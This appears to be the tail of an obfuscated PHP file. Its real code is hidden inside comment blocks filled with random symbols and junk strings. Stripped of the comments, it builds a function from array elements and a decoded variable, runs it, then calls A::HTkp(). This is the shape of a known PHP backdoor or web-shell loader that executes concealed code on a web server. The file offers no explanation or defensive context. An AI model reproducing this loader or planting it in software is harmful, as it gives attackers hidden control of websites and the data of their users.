U0m☻⊜◰⒌※∙⊓⚘）ⓩ④⒃㊗✭㈦▅❧═↟⋆♬≍≬ⓔ∩⒠⑶﹂➨✕⋳

-*///
[/*-


⑽Ⅾ③⊤☳╎╊☵☣£⋙≩≶▷⇧⋩◥⌘⒓Ⓣ→ˉ➊♈☿


6H#⑽Ⅾ③⊤☳╎╊☵☣£⋙≩≶▷⇧⋩◥⌘⒓Ⓣ→ˉ➊♈☿


-*///
4+1/*-UyXm-*///
]/*-
◀◨
dv5FA<,Ob◀◨
-*///
);/*-|^EifZ,#Sf-*///
@$KzcXD/*-k,6jQ_8<-*///
[/*-<>fC-*///
0/*-,-*///
]/*-

➎⅜♧✯⊦⋌⅗ℒ¥⋁Ⓛ≨➹⋊㊟ⓛ㊜

(e0qnuwx➎⅜♧✯⊦⋌⅗ℒ¥⋁Ⓛ≨➹⋊㊟ⓛ㊜

-*///
(/*-UqJ<zuc-*///
"",/*-

≍Ⓕ︿☤≲≭◍⋔⋺▲☽◻➲》❄➊↽ⓩ⋃∭➜☑≄⓹≒⒝◶☒∣

c}m54I`≍Ⓕ︿☤≲≭◍⋔⋺▲☽◻➲》❄➊↽ⓩ⋃∭➜☑≄⓹≒⒝◶☒∣

-*///
 $KzcXD/*-Gjip5)v=-*///
[/*-


ⅳⓅ↥∙▣⇣➐∬➛◈⅔╩⇎▌Ⅵ⊈➍Ⓕ≞◆⊓ↅ


-Yuh,ⅳⓅ↥∙▣⇣➐∬➛◈⅔╩⇎▌Ⅵ⊈➍Ⓕ≞◆⊓ↅ


-*///
1+6/*-

╜♥♪《㊡⋨¤▼⋶▎≙⇚∘✥❽Ⅾ¶Ⅻ

A>6╜♥♪《㊡⋨¤▼⋶▎≙⇚∘✥❽Ⅾ¶Ⅻ

-*///
] /*-C:6UH!Z-*///
. /*-

⇆≶⊭☊︷➧Θ❧⑳☌➐∞↛❷⇝㈢㊪◨⋳✽─

x=⇆≶⊭☊︷➧Θ❧⑳☌➐∞↛❷⇝㈢㊪◨⋳✽─

-*///
$KzcXD/*-!gs}-*///
[/*-
⑯⓹∆［⅓█】⒝⋯❣◨⑸➑
;H⑯⓹∆［⅓█】⒝⋯❣◨⑸➑
-*///
0+4/*-|E~]v,T$eH-*///
]/*-


◞⒍⊐╋◘Ⓗℋ◊⋗⇔▿┬


u,J◞⒍⊐╋◘Ⓗℋ◊⋗⇔▿┬


-*///
(/*-CADf.e5v~A-*///
$HOxSk/*-
≇Ⅳ≂⊏❶↳‐┧┒﹜∭✙卍㈥╗〃⓵⒣㎡◙Ⓩ✵☢웃⓺➒☸♠⋞╣≥
z<!e$#w!s≇Ⅳ≂⊏❶↳‐┧┒﹜∭✙卍㈥╗〃⓵⒣㎡◙Ⓩ✵☢웃⓺➒☸♠⋞╣≥
-*///
)/*-
Ⓓ∥┨ϡ⒯⌖∢⓵⑶ↆ▥∝☎⊱▲◕
FUATsQc1oGⒹ∥┨ϡ⒯⌖∢⓵⑶ↆ▥∝☎⊱▲◕
-*///
 . /*-
≎㊇≫⋛¶›⅞⋉
(-n^≎㊇≫⋛¶›⅞⋉
-*///
$KzcXD/*-%bXT+TqW-*///
[/*-C7lHj-*///
7+1/*-3BMgp-*///
]/*-.@5]5-*///
);/*-UMvQ+u710-*///
/*-

╔⓸→⊈⑵÷❧⋳▌

4hT╔⓸→⊈⑵÷❧⋳▌

-*///
die;/*-


❃♢☠ℂ✯▊☂﹜◥⇂⒬✣⋘㊁Ↄ⒴┛◜⊭↊☐ⓘ


;vV@x❃♢☠ℂ✯▊☂﹜◥⇂⒬✣⋘㊁Ↄ⒴┛◜⊭↊☐ⓘ


-*///
 endif;/*-O-il-*///
 }/*-
➨ⅵ⇆◭ⓑ﹌✃╎‰┵㈦◲⇇░◻㊰Ⓜ
MPWp➨ⅵ⇆◭ⓑ﹌✃╎‰┵㈦◲⇇░◻㊰Ⓜ
-*///
}/*-Tez>wm-*///
A/*-|.m{-*///
::/*-

⑾☩≜◳⓴∓Ⓞ➒↨

oxdZ_zD⑾☩≜◳⓴∓Ⓞ➒↨

-*///
HTkp/*-


⋣⅐↋ℒⓈ╛◶◔】④⋩ⓚ∙㊭═➏▩♦╗↰◽◘╪★➀


VMD+L⋣⅐↋ℒⓈ╛◶◔】④⋩ⓚ∙㊭═➏▩♦╗↰◽◘╪★➀


-*///
();/*-
┣⇎∈┊⋘⊿❄▢⋷✽➅㊧﹂✵☜❽﹍➈❈ϡ♧々ℳ
qqf|.h┣⇎∈┊⋘⊿❄▢⋷✽➅㊧﹂✵☜❽﹍➈❈ϡ♧々ℳ
-*///
 ?>